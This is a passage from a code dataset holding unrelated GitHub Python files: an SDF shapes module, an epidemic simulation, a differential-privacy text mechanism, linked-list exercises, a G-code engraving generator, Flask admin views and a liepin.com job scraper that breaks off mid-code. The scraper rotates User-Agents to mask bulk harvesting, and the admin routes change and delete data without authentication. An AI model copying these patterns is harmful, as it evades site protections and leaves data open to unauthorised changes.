* g1.y * x11 - h1.z * x1 + g2.x * g2.y * x12 - h2.z * x4) - x16 * x9)\n else:\n h = dr.select(v1 < v2, h1, h2)\n return mi.Matrix2f([[h.x, h.z], [h.z, h.y]])\n\n\nclass HalfSpaceSDF(SDFBase):\n\n def __init__(self, p):\n super().__init__()\n self.p = p\n\n def eval(self, x, detached=False):\n if detached:\n return (x.x - dr.detach(self.p.x))\n return (x.x - self.p.x)\n\n def eval_grad(self, x, detached=False):\n return mi.Vector2f(1.0, 0.0)\n\n def eval_hessian(self, x, detached=False):\n return mi.Vector3f(0.0, 0.0, 0.0)\n\n\ndef arc_sdf(p, theta=np.pi / 4, phi=-0.4, ra=0.25, rb=0.1):\n sca = np.array([np.cos(theta), np.sin(theta)])\n scb = np.array([np.cos(phi), np.sin(phi)])\n R = np.array([[sca[0], sca[1]], [-sca[1], sca[0]]])\n p = p @ R\n p[:, 0] = np.abs(p[:, 0])\n length = np.sqrt(np.sum(p ** 2, axis=1))\n dotprod = p[:, 0] * scb[0] + p[:, 1] * scb[1]\n k = np.where(scb[1] * p[:, 0] > scb[0] * p[:, 1], dotprod, length)\n return np.sqrt(length ** 2 + ra ** 2 - 2.0 * ra * k) - rb\n\n\ndef disk_sdf(p, r=0.25):\n return np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2) - r\n","repo_name":"rgl-epfl/differentiable-sdf-rendering","sub_path":"python/sdf2d/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":7783,"program_lang":"python","lang":"en","doc_type":"code","stars":810,"dataset":"github-code","pt":"36"} +{"seq_id":"72167499943","text":"import numpy as np\nimport Person\nimport Population\nimport Interaction_Sites\nimport Policy\n\n# will_go_to_site parameters (prob person will go somewhere each day)\nA_WILL_GO_PROB = .05\nB_WILL_GO_PROB = .4\nC_WILL_GO_PROB = .8\nTESTS_PER_DAY = 100\n\n# Polciy variables\ninitial_mask_mandate, initial_lockdown_mandate = False, False\nlockdown_trigger, lockdown_day_trigger = None, 25\nmask_trigger, mask_day_trigger = None, 25\n\ndef RunEpidemic(nPop, n0, nDays):\n # Initalize the policy class\n policy = Policy.Policy(initial_mask_mandate=initial_mask_mandate, initial_lockdown_mandate=initial_lockdown_mandate, \n mask_trigger=mask_trigger, mask_day_trigger=mask_day_trigger, \n lockdown_trigger=lockdown_trigger, lockdown_day_trigger=lockdown_day_trigger)\n \n old_mask_mandate, old_lockdown = 
initial_mask_mandate, initial_lockdown_mandate\n \n # Initialize the population\n pop = Population.Population(nPop, n0, policy=policy)\n \n # Initalize the interaction sites\n inter_sites = Interaction_Sites.Interaction_Sites(pop_obj=pop)\n \n # Link the pop and inter_sites to the policy class\n policy.set_simulation(population=pop, interaction_sites=inter_sites)\n\n # Arrays to store the values during the simulation\n track_new_infected = np.zeros(nDays, dtype=int) # new infections\n track_infected = np.zeros(nDays, dtype=int) # currently infected\n track_susceptible = np.zeros(nDays, dtype=int) # never been exposed\n track_recovered = np.zeros(nDays, dtype=int) # total recovered\n track_dead = np.zeros(nDays, dtype=int) # total deaths\n track_tested = np.zeros(nDays, dtype=int) # total tested individuals\n track_quarantined = np.zeros(nDays, dtype=int) # population currently in quarantine ACTUALLY DOES TOTAL QUARINTIED \n\n # Loop over the number of days\n for day in range(nDays):\n\n #Count all the different states of people\n track_infected[day] = pop.count_infected()\n track_susceptible[day] = pop.count_susceptible()\n track_recovered[day] = pop.count_recovered()\n track_dead[day] = pop.count_dead()\n track_tested[day] = pop.count_tested()\n track_quarantined[day] = pop.count_quarantined()\n\n #track the days someone has been infected?\n if day != 0:\n new_recovered = track_recovered[day] - track_recovered[day-1]\n new_dead = track_dead[day] - track_dead[day-1]\n track_new_infected[day] = track_infected[day] - track_infected[day-1] + new_recovered + new_dead\n\n # Find grade A, B, C site visits\n will_visit_A = inter_sites.will_visit_site(inter_sites.get_grade_A_sites(), A_WILL_GO_PROB)\n will_visit_B = inter_sites.will_visit_site(inter_sites.get_grade_B_sites(), B_WILL_GO_PROB)\n will_visit_C = inter_sites.will_visit_site(inter_sites.get_grade_C_sites(), C_WILL_GO_PROB)\n\n # Do site interactions based on who is going to sites - INFECTION SPREAD OCCURS HERE\n inter_sites.site_interaction(will_visit_A, day)\n #inter_sites.site_interaction(will_visit_B, inter_sites.get_grade_B_sites(), day)\n #inter_sites.site_interaction(will_visit_C, inter_sites.get_grade_C_sites(), day)\n\n # Manage at home interactions\n inter_sites.house_interact(day)\n\n #Manage testing sites\n inter_sites.testing_site(TESTS_PER_DAY, day)\n\n # See who needs to be cured or die\n infected_people = pop.get_infected()\n for index in infected_people:\n infected_person = pop.get_person(index=index)\n\n if infected_person.get_case_severity() == \"Death\":\n is_dead = infected_person.check_dead(day)\n if is_dead and pop.update_dead(index=infected_person.get_index()) == False:\n print(\"Did not die correctly\")\n\n else:\n is_cured = infected_person.check_cured(day) # method will check and cure them if needed ALWAYS IS FALSE??\n if is_cured and pop.update_cured(index=infected_person.get_index()) == False:\n print(\"Did not cure correctly\")\n\n is_quarantined = infected_person.check_quarantine(day)\n\n print(\"Day: {}, infected: {}, recovered: {}, suceptible: {}, dead: {}, tested: {} total quarantined: {}\".format(day, track_infected[day],\n track_recovered[day],\n track_susceptible[day],\n track_dead[day],\n track_tested[day],\n track_quarantined[day]))\n print(\"At the end, \", track_susceptible[-1], \"never got it\")\n print(track_dead[-1], \"died\")\n print(np.max(track_infected), \"had it at the peak\")\n print(track_tested[day], \"have been tested\")\n print (np.max(track_quarantined), \"were in quarantine at the 
peak\")\n\n return track_infected, track_new_infected, track_recovered, track_susceptible, track_dead, track_tested, track_quarantined, Population\n","repo_name":"Queens-Physics/quaboom","sub_path":"old_sim_files/interaction_MC.py","file_name":"interaction_MC.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"43326016","text":"import re\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport gensim.downloader as api\nfrom nltk.tokenize import word_tokenize\nfrom sacremoses import MosesDetokenizer\nfrom sklearn.neighbors import NearestNeighbors\nfrom torch import Tensor\nfrom typing import Tuple\n\n\nfrom gensim.models import Word2Vec\n\nimport pandas as pd\nfrom typing import List\n\nimport nltk\n\nnltk.download(\"punkt\")\nbeta = 0.001\nhtml_cleaner = re.compile(\"<.*?>\")\nmodel_gigaword = api.load(\"glove-wiki-gigaword-50\")\n\n\ndef get_threshold(beta: float, epsilon: float, model: Word2Vec) -> float:\n \"\"\"\n Calculate the threshold (gamma) for the Truncated Exponential Mechanism.\n\n Args:\n beta (float): The privacy parameter beta.\n epsilon (float): The privacy parameter epsilon.\n model (Word2Vec): The word embedding model.\n\n Returns:\n float: The threshold (gamma) for the Truncated Exponential Mechanism.\n \"\"\"\n vocab_size = len(model.vectors)\n x = ((1 - beta) / beta) * (vocab_size - 1)\n gamma = (2 / epsilon) * np.log(x)\n return gamma\n\n\ndef radius_neighbors(\n vectors: Tensor, vector: Tensor, radius: float\n) -> Tuple[Tensor, Tensor]:\n \"\"\"\n Find neighbors within a given radius of a target vector in a set of vectors.\n\n Args:\n vectors (Tensor): The set of vectors to search within.\n vector (Tensor): The target vector for which neighbors are sought.\n radius (float): The search radius to find neighbors.\n\n Returns:\n Tuple[Tensor, Tensor]: A tuple containing two tensors:\n - dists (Tensor): Distances of the neighbors from the target vector.\n - ids (Tensor): Indices of the neighbors in the input vectors.\n \"\"\"\n x = torch.linalg.norm(vectors - vector, axis=-1)\n in_radius = x < radius\n dists, ids = x[in_radius], (in_radius).nonzero()[:, 0]\n return dists, ids\n\n\ndef truncated_exponential_mechanism(\n word: str,\n model: Word2Vec,\n cuda_vectors: torch.Tensor,\n gumbel_sampler: torch.distributions.Gumbel,\n gamma: float,\n epsilon: float,\n):\n \"\"\"\n Apply the truncated exponential mechanism to generate a differentially private word.\n\n Args:\n word (str): The input word.\n model (gensim.models.keyedvectors.Word2VecKeyedVectors): The word embedding model.\n cuda_vectors (torch.Tensor): Word embeddings as torch Tensor on GPU.\n gumbel_sampler (torch.distributions.Gumbel): Gumbel noise sampler.\n gamma (float): The threshold for the truncated exponential mechanism.\n epsilon (float): The privacy parameter.\n\n Returns:\n str: The differentially private word.\n \"\"\"\n\n vector = cuda_vectors[model.key_to_index[word], None]\n dists, ids = radius_neighbors(cuda_vectors, vector, gamma)\n assert dists.shape == ids.shape\n\n threshold = gamma\n vocab_size = len(model.vectors)\n out_of_threshold_size = torch.tensor([vocab_size - len(dists)])\n\n perp_score = -1 * threshold + 2 * (torch.log(out_of_threshold_size) / epsilon)\n scores = -1 * dists\n scores = torch.hstack([scores, perp_score.cuda()])\n\n noises = gumbel_sampler.sample((len(dists) + 1,))[:, 0]\n assert noises.shape == scores.shape\n\n noisy_scores = scores + 
noises\n max_idx = torch.argmax(noisy_scores).item()\n\n if max_idx == len(noisy_scores) - 1:\n support = np.setdiff1d(np.arange(vocab_size), ids.cpu().numpy())\n assert len(support) == out_of_threshold_size\n private_word_id = np.random.choice(support)\n else:\n private_word_id = ids[max_idx]\n private_word = model.index_to_key[private_word_id]\n return private_word\n\n\ndef tem_review(\n review: str,\n model: Word2Vec,\n cuda_vectors: torch.Tensor,\n gumbel_sampler: torch.distributions.Gumbel,\n gamma: float,\n html_cleaner: re.Pattern,\n epsilon: float,\n):\n \"\"\"\n Apply the Truncated Exponential Mechanism (TEM) to a text review to generate a differentially private version.\n\n Args:\n review (str): The input text review.\n model (gensim.models.keyedvectors.Word2VecKeyedVectors): The word embedding model.\n cuda_vectors (torch.Tensor): Word embeddings as a torch Tensor on GPU.\n gumbel_sampler (torch.distributions.Gumbel): Gumbel noise sampler.\n gamma (float): The threshold for the truncated exponential mechanism.\n html_cleaner (re.Pattern): Regular expression pattern for cleaning HTML tags.\n epsilon (float): The privacy parameter.\n\n Returns:\n str: The differentially private version of the input review.\n \"\"\"\n review = word_tokenize(re.sub(html_cleaner, \"\", review.lower()))\n priv_words = []\n\n for word in review:\n if word in model.key_to_index:\n priv_word = truncated_exponential_mechanism(\n word=word,\n model=model,\n cuda_vectors=cuda_vectors,\n gumbel_sampler=gumbel_sampler,\n gamma=gamma,\n epsilon=epsilon,\n )\n priv_words.append(priv_word)\n\n priv_review = MosesDetokenizer().detokenize(priv_words, return_str=True)\n return priv_review\n\n\ndef tem_df(\n df: pd.DataFrame, model: Word2Vec, epsilon_list: List[float], save_path: str\n) -> pd.DataFrame:\n \"\"\"\n Apply the Truncated Exponential Mechanism (TEM) to a DataFrame of text reviews with varying epsilon values.\n\n Args:\n df (pd.DataFrame): The DataFrame containing the text reviews.\n model (gensim.models.keyedvectors.Word2VecKeyedVectors): The word embedding model.\n epsilon_list (List[float]): A list of epsilon values for differential privacy.\n save_path (str): The path to save the results CSV file.\n\n Returns:\n pd.DataFrame: A DataFrame containing the differentially private versions of text reviews.\n \"\"\"\n\n cuda_vectors = torch.from_numpy(model.vectors).float().cuda()\n private_df_list = []\n for epsilon in epsilon_list:\n gamma = get_threshold(beta=beta, epsilon=epsilon, model=model)\n mean = torch.tensor([0.0]).cuda()\n scale = torch.tensor([2 / epsilon]).cuda()\n gumbel_sampler = torch.distributions.gumbel.Gumbel(mean, scale)\n\n private_df_eps = df[\"review\"].progress_apply(\n lambda review: tem_review(\n review=review,\n model=model,\n cuda_vectors=cuda_vectors,\n gumbel_sampler=gumbel_sampler,\n gamma=gamma,\n html_cleaner=html_cleaner,\n epsilon=epsilon,\n )\n )\n private_df_list.append(private_df_eps)\n\n private_df = pd.DataFrame(\n zip(*private_df_list),\n columns=[f\"tem_eps={epsilon}\" for epsilon in epsilon_list],\n )\n\n private_df.to_csv(save_path, index=False)\n return private_df\n","repo_name":"SaitejaUtpala/dp_prompt","sub_path":"mechanisms/wordlevel/tem.py","file_name":"tem.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"38552330303","text":"class S_Node:\n def __init__(self, value):\n self.value = value\n self.N_node = None\n\n\na = S_Node(1)\nb = S_Node(2)\nc = 
S_Node(3)\n\na.N_node = b\nb.N_node = c\nprint(b.N_node.value)\n\n\n# ---------------------------------------------------\n# Doubly linked-list\nclass D_Node:\n    def __init__(self, value):\n        self.value = value\n        self.N_node = None\n        self.P_node = None\n\n\nd = D_Node(4)\ne = D_Node(5)\nf = D_Node(6)\ng = D_Node(7)\n\nd.P_node = None\nd.N_node = e\n\ne.P_node = d\ne.N_node = f\n\nf.P_node = e\nf.N_node = g\n\ng.P_node = f\ng.N_node = None\n\nprint(d.N_node.N_node.N_node.value)\n","repo_name":"pro-ghanem/MY-DSA-Problem-Solving","sub_path":"Linked_Array/singly and double linked-list.py","file_name":"singly and double linked-list.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"40200848443","text":"from Tkinter import *\nfrom math import *\nimport os\nimport re\nimport sys\nimport string\nimport getopt\nimport math\n\nString = \"\"\nSafeZ = 2\nXStart = 0\nXLineOffset = 0\nXIndentList = \"\"\nYStart = 0\nYLineOffset = 0\nDepth = 0.1\nXScale = 1\nYScale = 1\nCSpaceP = 25\nWSpaceP = 100\nAngle = 0\nMirror = 0\nFlip = 0\nstringlist = []\n\n#=======================================================================\nclass Character:\n    def __init__(self, key):\n        self.key = key\n        self.stroke_list = []\n\n    def __repr__(self):\n        return \"%s\" % (self.stroke_list)\n\n    def get_xmax(self):\n        try: return max([s.xmax for s in self.stroke_list[:]])\n        except ValueError: return 0\n\n    def get_ymax(self):\n        try: return max([s.ymax for s in self.stroke_list[:]])\n        except ValueError: return 0\n\n\n\n#=======================================================================\nclass Line:\n\n    def __init__(self, coords):\n        self.xstart, self.ystart, self.xend, self.yend = coords\n        self.xmax = max(self.xstart, self.xend)\n        self.ymax = max(self.ystart, self.yend)\n\n    def __repr__(self):\n        return (\"Line([%s, %s, %s, %s])\" % (self.xstart, self.ystart, self.xend, self.yend))\n\n#=======================================================================\nclass GCodeGenerator:\n    \n    def generateGCode(self, text, fontName):\n        #erase old gcode as needed\n        gcode = [] \n        oldx = oldy = -99990.0 \n        \n        gcode.append( 'G0 Z%.4f~' %(SafeZ))\n        font = self.parse(fontName)\n\n        font_line_height = max(font[key].get_ymax() for key in font)\n        font_word_space = max(font[key].get_xmax() for key in font) * (WSpaceP/100.0)\n        font_char_space = font_word_space * (CSpaceP /100.0)\n\n        xoffset = 0 # distance along raw string in font units\n        # calc a plot scale so we can show about first 15 chars of string\n        # in the preview window\n        PlotScale = 15 * font['A'].get_xmax() * XScale / 150\n\n        for char in text:\n            if char == ' ':\n                xoffset += font_word_space\n                continue\n            try:\n                first_stroke = True\n                for stroke in font[char].stroke_list:\n                    # gcode.append(\"(%f,%f to %f,%f)\" %(stroke.xstart,stroke.ystart,stroke.xend,stroke.yend ))\n                    dx = oldx - stroke.xstart\n                    dy = oldy - stroke.ystart\n                    dist = sqrt(dx*dx + dy*dy)\n\n                    x1 = stroke.xstart + xoffset\n                    y1 = stroke.ystart\n                    if Mirror == 1:\n                        x1 = -x1\n                    if Flip == 1:\n                        y1 = -y1\n\n                    # check and see if we need to move to a new discontinuous start point\n                    if (dist > 0.001) or first_stroke:\n                        first_stroke = False\n                        #lift engraver, rapid to start of stroke, drop tool\n                        gcode.append(\"G0 Z%.4f~\" %(SafeZ))\n                        gcode.append(self.getGCode(0, x1, y1, XStart, YStart))\n                        gcode.append(\"G1 Z%.4f~\" %(Depth))\n\n                    x2 = stroke.xend + xoffset\n                    y2 = stroke.yend\n                    if Mirror == 1:\n                        x2 = -x2\n                    if Flip == 1:\n                        y2 = -y2\n                    
gcode.append(self.getGCode(1, x2, y2, XStart, YStart))\n oldx, oldy = stroke.xend, stroke.yend\n\n # move over for next character\n char_width = font[char].get_xmax()\n xoffset += font_char_space + char_width\n\n except KeyError:\n print(\"(warning: character '0x%02X' not found in font defn)\" % ord(char))\n\n gcode.append(\"G0 Z%.4f~\" %(SafeZ)) # final engraver up\n return gcode\n \n def parse(self, fontName):\n font = {}\n key = None\n num_cmds = 0\n line_num = 0\n fileContents = []\n with open(\"fonts/%s.cxf\" %(fontName)) as file:\n fileContents = file.readlines()\n for text in fileContents:\n #format for a typical letter (lowercase r):\n ##comment, with a blank line after it\n #\n #[r] 3\n #L 0,0,0,6\n #L 0,6,2,6\n #A 2,5,1,0,90\n #\n line_num += 1\n end_char = re.match('^$', text) #blank line\n if end_char and key: #save the character to our dictionary\n font[key] = Character(key)\n font[key].stroke_list = stroke_list\n font[key].xmax = xmax\n if (num_cmds != cmds_read):\n print (\"(warning: discrepancy in number of commands %s, line %s, %s != %s )\" % (fontfile, line_num, num_cmds, cmds_read))\n\n new_cmd = re.match('^\\[(.*)\\]\\s(\\d+)', text)\n if new_cmd: #new character\n key = new_cmd.group(1)\n num_cmds = int(new_cmd.group(2)) #for debug\n cmds_read = 0\n stroke_list = []\n xmax, ymax = 0, 0\n\n line_cmd = re.match('^L (.*)', text)\n if line_cmd:\n cmds_read += 1\n coords = line_cmd.group(1)\n coords = [float(n) for n in coords.split(',')]\n stroke_list += [Line(coords)]\n xmax = max(xmax, coords[0], coords[2])\n\n arc_cmd = re.match('^A (.*)', text)\n if arc_cmd:\n cmds_read += 1\n coords = arc_cmd.group(1)\n coords = [float(n) for n in coords.split(',')]\n xcenter, ycenter, radius, start_angle, end_angle = coords\n # since font defn has arcs as ccw, we need some font foo\n if ( end_angle < start_angle ):\n start_angle -= 360.0\n # approximate arc with line seg every 20 degrees\n segs = int((end_angle - start_angle) / 20) + 1\n angleincr = (end_angle - start_angle)/segs\n xstart = cos(start_angle * pi/180) * radius + xcenter\n ystart = sin(start_angle * pi/180) * radius + ycenter\n angle = start_angle\n for i in range(segs):\n angle += angleincr\n xend = cos(angle * pi/180) * radius + xcenter\n yend = sin(angle * pi/180) * radius + ycenter\n coords = [xstart,ystart,xend,yend]\n stroke_list += [Line(coords)]\n xmax = max(xmax, coords[0], coords[2])\n ymax = max(ymax, coords[1], coords[3])\n xstart = xend\n ystart = yend\n return font\n \n def getGCode(self, z, x, y, xStart, yStart):\n xScale = 0.4000\n yScale = 0.5000\n angle = 0.0000\n rotatedX = 0.0000\n rotatedY = 0.0000\n \n scaledX = x*xScale\n scaledY = y*yScale\n distanceOfXYFromZero = math.sqrt(((scaledX*scaledX) + (scaledY*scaledY)))\n if x != 0:\n directionToXY = math.atan(scaledY/scaledX)\n rotatedX = distanceOfXYFromZero * (math.cos((directionToXY + angle)))\n rotatedY = distanceOfXYFromZero * (math.sin((directionToXY + angle)))\n \n if z < 0.5:\n return \"G00 X%.4f Y%.4f~\" %((rotatedX + xStart), (rotatedY + yStart))\n else:\n return \"G01 X%.4f Y%.4f~\" %((rotatedX + xStart), (rotatedY + yStart))\n","repo_name":"BuzyFranklin/WriteBot","sub_path":"GCodeGenerator.py","file_name":"GCodeGenerator.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"42491256944","text":"from flask import abort, flash, render_template, redirect, url_for, current_app as app\nfrom sqlalchemy.exc import IntegrityError\n\nfrom . 
import admin\nfrom .forms import AuthorForm, CategoryForm, EntryForm\n\nfrom demo_app import db\nfrom demo_app.blog.models import Author, Category, Entry\n\n@admin.route('/', methods=['GET'])\ndef index():\n    return render_template('admin/index.html')\n\n# Author views\n@admin.route('/authors', methods=['GET'])\n@admin.route('/authors/<int:page>', methods=['GET'])\ndef authors(page=1):\n    authors = Author.query.order_by('id').paginate(page, app.config['PER_PAGE'], False)\n    return render_template('admin/authors/author_list.html', authors=authors)\n\n@admin.route('/authors/detail/<int:author_id>', methods=['GET'])\ndef author_detail(author_id):\n    author = Author.query.filter_by(id=author_id).first()\n    if author is not None:\n        return render_template('admin/authors/author_detail.html', author=author)\n    return abort(404)\n\n@admin.route('/authors/create', methods=['GET', 'POST'])\ndef author_create():\n    form = AuthorForm()\n    try:\n        if form.validate_on_submit():\n            author = Author(\n                name = form.name.data,\n                description = form.description.data,\n                email = form.email.data\n            )\n            db.session.add(author)\n            db.session.commit()\n            flash('Author has been successfully created')\n            return redirect(url_for('admin.authors'))\n    except IntegrityError:\n        db.session.rollback()\n        flash('Email must be unique')\n        return render_template('admin/authors/author_create.html', form=form), 404\n    return render_template('admin/authors/author_create.html', form=form)\n\n@admin.route('/authors/update/<int:author_id>', methods=['GET', 'POST'])\ndef author_update(author_id):\n    author = Author.query.filter_by(id=author_id).first()\n    if author is None:\n        return abort(404)\n    form = AuthorForm(obj=author)\n    try:\n        if form.validate_on_submit():\n            if form.name:\n                author.name = form.name.data\n            if form.description:\n                author.description = form.description.data\n            if form.email:\n                author.email = form.email.data\n            db.session.commit()\n            flash('Author has been successfully updated')\n            return redirect(url_for('admin.authors'))\n    except IntegrityError:\n        db.session.rollback()\n        flash('Author email must be unique')\n        return render_template('admin/authors/author_update.html', form=form, author=author), 404\n    return render_template('admin/authors/author_update.html', form=form, author=author)\n\n@admin.route('/authors/delete/<int:author_id>', methods=['GET'])\ndef author_delete(author_id):\n    author = Author.query.filter_by(id=author_id).first()\n    if author is None:\n        return abort(404)\n    db.session.delete(author)\n    db.session.commit()\n    flash('Author has been successfully deleted')\n    return redirect(url_for('admin.authors'))\n\n# Category views\n@admin.route('/categories', methods=['GET'])\n@admin.route('/categories/<int:page>', methods=['GET'])\ndef categories(page=1):\n    categories = Category.query.order_by('id').paginate(page, app.config['PER_PAGE'], False)\n    return render_template('admin/categories/category_list.html', categories=categories)\n    \n@admin.route('/categories/create', methods=['GET', 'POST'])\ndef category_create():\n    form = CategoryForm()\n    try:\n        if form.validate_on_submit():\n            category = Category(\n                name = form.name.data\n            )\n            db.session.add(category)\n            db.session.commit()\n            flash('Category has been successfully created')\n            return redirect(url_for('admin.categories'))\n    except IntegrityError:\n        db.session.rollback()\n        flash('Category name must be unique')\n        return render_template('admin/categories/category_create.html', form=form), 404\n    return render_template('admin/categories/category_create.html', form=form)\n\n@admin.route('/categories/update/<int:category_id>', methods=['GET', 'POST'])\ndef 
category_update(category_id):\n    category = Category.query.filter_by(id=category_id).first()\n    if category is None:\n        return abort(404)\n    form = CategoryForm(obj=category)\n    try:\n        if form.validate_on_submit():\n            if form.name:\n                category.name = form.name.data\n            db.session.commit()\n            flash('Category has been successfully updated')\n            return redirect(url_for('admin.categories'))\n    except IntegrityError:\n        db.session.rollback()\n        flash('Category name must be unique')\n        return render_template('admin/categories/category_update.html', form=form, category=category), 404\n    return render_template('admin/categories/category_update.html', form=form, category=category)\n\n@admin.route('/categories/delete/<int:category_id>', methods=['GET'])\ndef category_delete(category_id):\n    category = Category.query.filter_by(id=category_id).first()\n    if category is None:\n        return abort(404)\n    db.session.delete(category)\n    db.session.commit()\n    flash('Category has been successfully deleted')\n    return redirect(url_for('admin.categories'))\n\n# Entry views\n@admin.route('/entries', methods=['GET'])\n@admin.route('/entries/<int:page>', methods=['GET'])\ndef entries(page=1):\n    entries = Entry.query.order_by('id').paginate(page, app.config['PER_PAGE'], False)\n    return render_template('admin/entries/entry_list.html', entries=entries)\n\n@admin.route('/entries/detail/<int:entry_id>', methods=['GET'])\ndef entry_detail(entry_id):\n    entry = Entry.query.filter_by(id=entry_id).first()\n    if entry is not None:\n        return render_template('admin/entries/entry_detail.html', entry=entry)\n    return abort(404)\n\n@admin.route('/entries/create', methods=['GET', 'POST'])\ndef entry_create():\n    form = EntryForm()\n    if form.validate_on_submit():\n        entry = Entry(\n            title = form.title.data,\n            body = form.body.data,\n            author=form.author.data,\n        )\n        for c in form.category.data:\n            entry.en_ca.append(c)\n        db.session.add(entry)\n        db.session.commit()\n        flash('Entry has been successfully created')\n        return redirect(url_for('admin.entries'))\n    return render_template('admin/entries/entry_create.html', form=form)\n\n@admin.route('/entries/update/<int:entry_id>', methods=['GET', 'POST'])\ndef entry_update(entry_id):\n    entry = Entry.query.filter_by(id=entry_id).first()\n    if entry is None:\n        return abort(404)\n    form = EntryForm(obj=entry)\n    if form.validate_on_submit():\n        if form.title:\n            entry.title = form.title.data\n        if form.body:\n            entry.body = form.body.data\n        if form.author:\n            entry.author = form.author.data\n        if form.category.data:\n            entry.refresh_categories()\n            for c in form.category.data:\n                entry.en_ca.append(c)\n        db.session.commit()\n        flash('Entry has been successfully updated')\n        return redirect(url_for('admin.entries'))\n    return render_template('admin/entries/entry_update.html', form=form, entry=entry)\n\n@admin.route('/entries/delete/<int:entry_id>', methods=['GET'])\ndef entry_delete(entry_id):\n    entry = Entry.query.filter_by(id=entry_id).first()\n    if entry is None:\n        return abort(404)\n    db.session.delete(entry)\n    db.session.commit()\n    flash('Entry has been successfully deleted')\n    return redirect(url_for('admin.entries'))","repo_name":"AlexPG/flask-demo-app","sub_path":"demo_app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"1532504633","text":"# coding:utf-8\n# This file contains the crawler code for liepin.com\n# @author jinyu\n# @date 2020-09-24\n\nimport requests\nimport random\nimport re\nimport os\nimport time\nimport pandas as pd\nimport jieba\nfrom jieba import analyse\nfrom wordcloud import 
WordCloud\nimport matplotlib.pyplot as plt\n\nfrom SpiderData import *\n\n\nclass MySpider:\n    # Spider for liepin.com\n\n    targetName = 'liepin'\n\n    targetDir = '/docs/data/'\n\n    # Liepin base url\n    url = 'https://www.liepin.com/zhaopin/?'\n    # Job titles to crawl\n    jobs = ['数据挖掘', '图像算法工程师', 'java后端', '互联网产品经理']\n    # Cities to crawl, and their corresponding dqs codes\n    citys = ['北京', '上海', '深圳', '广州', '武汉', '杭州']\n    cityIds = ['010', '020', '050090', '050020', '170020', '070020']\n\n    # Regular expression used to match job links (the leading '<a[^>' is an assumed reconstruction; the tag literal was lost in extraction)\n    regExpUrl = '<a[^>]*href=\\\"(https://www.liepin.com/job[^\"]*)\\\"[^>]*'\n    # Regular expression used to match the job requirement section (the HTML tag literals in this pattern were lost in extraction and are left as gaps)\n    regExpRequire = '[\\s\\S]*?(?<=任职资格|任职要求)[::]?([\\s\\S]*?)(?<=)?'\n\n    def __init__(self) -> None:\n        self.init()\n\n    def UA(self):\n        \"\"\" Randomly pick a suitable User-Agent for the spider's request headers \"\"\"\n        ua = random.choice(uapools)\n        return {'User-Agent': ua}\n\n    def init(self):\n        if(not os.path.exists(os.getcwd()+'/spider/data')):\n            os.mkdir(os.getcwd()+'/spider/data')\n\n    def run(self):\n        # Crawl the job posting urls\n\n        try:\n            for job in self.jobs:\n                # current job being crawled\n                print('Current job:', job)\n\n                url_target = self.url+'key='+job\n\n                f = open(os.getcwd()+'/spider/data/' +\n                         self.targetName+'_Job-'+job+'.csv', 'w')\n                f.write('\"url\",\"city\"\\n')\n\n                for i in range(len(self.citys)):\n                    # iterate over the different cities\n\n                    # number of job posts crawled so far\n                    jobNum = 0\n\n                    # current page being crawled\n                    curPage = 0\n\n                    while jobNum < 100:\n                        url_target_final = url_target+'&dqs=' + \\\n                            self.cityIds[i]+'&curPage='+str(curPage)\n\n                        print('Crawling url:', url_target_final)\n\n                        # fetch the data with requests.get, rotating User-Agents automatically\n                        data_orgin = requests.get(\n                            url=url_target_final, headers=self.UA())\n\n                        # decode the fetched content as utf-8\n                        data_html = data_orgin.content.decode(\"utf-8\")\n\n                        # check whether the html content was fetched successfully (the marker string was lost in extraction)\n                        if '' in data_html and job in data_html:\n                            print('get data success!')\n                        else:\n                            print('get data failed!')\n\n                        # extract the job urls with the regular expression\n                        data_reGet = re.compile(\n                            self.regExpUrl).findall(data_html)\n\n                        for url_a in data_reGet:\n                            print(url_a)\n                            f.write(url_a+' , '+self.citys[i]+' \\n')\n                            jobNum = jobNum+1\n                            time.sleep(0.01)\n\n                        curPage = curPage+1\n                        if curPage > 20:\n                            jobNum = 1000\n                    time.sleep(random.randint(1, 4))\n                f.close()\n\n        except IOError:\n            print('Unable to create the csv file')\n        except Exception as e:\n            print(e.args)\n        finally:\n            print('Get url finish!')\n\n        print('run end')\n\n    def run_getDetail(self):\n        # Fetch the job details\n\n        # maximum number of urls to crawl\n        maxNum = 5\n\n        for job in self.jobs:\n            # iterate over each job title\n            print('Current job:', job)\n\n            for city in self.citys:\n                try:\n                    csvData = pd.read_csv(\n                        os.getcwd()+'/spider/data/'+self.targetName+'_Job-'+job+'.csv')\n\n                    f = open(os.getcwd()+'/spider/data/' +\n                             self.targetName+'_require-'+job+'_city-'+city+'.txt', 'w')\n\n                    numOfUrl = 0\n\n                    for i in range(csvData.shape[0]):\n\n                        if numOfUrl > maxNum:\n                            break\n\n                        # skip rows that do not belong to the current city\n                        if(not city in csvData.city[i]):\n                            continue\n\n                        numOfUrl = numOfUrl+1\n\n                        url_target_final = csvData.url[i]\n\n                        url_target_final = str(\n                            url_target_final).replace(' ', '')\n\n                        # fetch the data with requests.get, rotating User-Agents automatically\n                        data_orgin = requests.get(\n                            url=url_target_final, headers=self.UA())\n\n                        # decode the fetched content as utf-8\n                        data_html = data_orgin.content.decode(\"utf-8\")\n\n                        # check whether the html content was fetched successfully (the marker string was lost in extraction)\n                        if '' in data_html and job in data_html:\n                            print('get '+url_target_final+'data success!')\n                        else:\n                            print('get '+url_target_final+' data failed!')\n\n                        # extract the job requirements with the regular expression\n                        data_reGet = re.compile(\n                            self.regExpRequire).findall(data_html)\n\n                        # output the matched results\n                        for data_detail in data_reGet:\n                            theStr = str(data_detail)\n                            if(theStr != ''):\n                                theStr = theStr.replace('<br/>', '\\n')  # '<br/>' is an assumed reconstruction; the original tag literal 